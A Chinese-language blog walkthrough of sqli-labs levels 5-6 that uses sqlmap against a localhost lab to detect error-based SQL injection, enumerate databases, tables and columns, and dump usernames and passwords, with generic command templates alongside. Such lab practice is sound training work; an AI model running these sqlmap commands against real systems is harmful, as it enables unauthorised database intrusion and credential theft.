sqli-labs靶场5-6  工具sqlmap GET方法、单双引号、报错注入

举报
黑色地带(崛起) 发表于 2023/02/18 23:39:41 2023/02/18
【摘要】 sqli-labs靶场5-6  工具sqlmap GET方法、单双引号、报错注入

sqli-labs靶场5-6  工具sqlmap GET方法、单双引号、报错注入

 目录

 推荐:

一、错误注入(sqlmap)SQL注入基本步骤:

二、扩展

2.1、命令扩展

2.2、注:

2.3、推荐:

三、Less5(GET-Double injection-Single Quotes -String)

 3.1、第一步:检测是否存在注入

基础操作

3.2、第二步:爆数据库名

命令

基础操作

3.3、第三步:爆数据库表名

命令

基础操作

3.4、第四步:爆字段名

命令:

基础操作

3.5、第五步:爆数据

命令:

基础操作:




 推荐:

【SQL注入-可回显】报错注入:简介、相关函数、利用方法 https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165718272016782390523827%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165718272016782390523827&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450




一、错误注入(sqlmap)SQL注入基本步骤:

第一步:注入点测试

第二步:爆数据库名

第三步:爆数据库表

第四步:爆字段

第五步:爆数据



二、扩展

2.1、命令扩展

(1)如果提前找到了数据库类型

--dbms +数据库

(2)扫描的等级

最高等级是

--leve=5 --risk=3


2.2、注:

我使用Windows中的sqlmap做,会带上python sqlmap.py

Linux:直接sqlmap +……


2.3、推荐:

(手工)【sqllabs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程 https://blog.csdn.net/qq_53079406/article/details/125015773?spm=1001.2014.3001.5501




三、Less5(GET-Double injection-Single Quotes -String)

 3.1、第一步:检测是否存在注入

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch

--batch是使用默认设置

编辑



编辑


其实环境都扫出来了 

就可以再加上--dbms mysql了



3.2、第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

编辑


 编辑




3.3、第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

编辑


 编辑




3.4、第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

编辑


编辑





3.5、第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch


基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

编辑


 编辑




注:

(5-6关基本类似,就以第五关为例)




【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。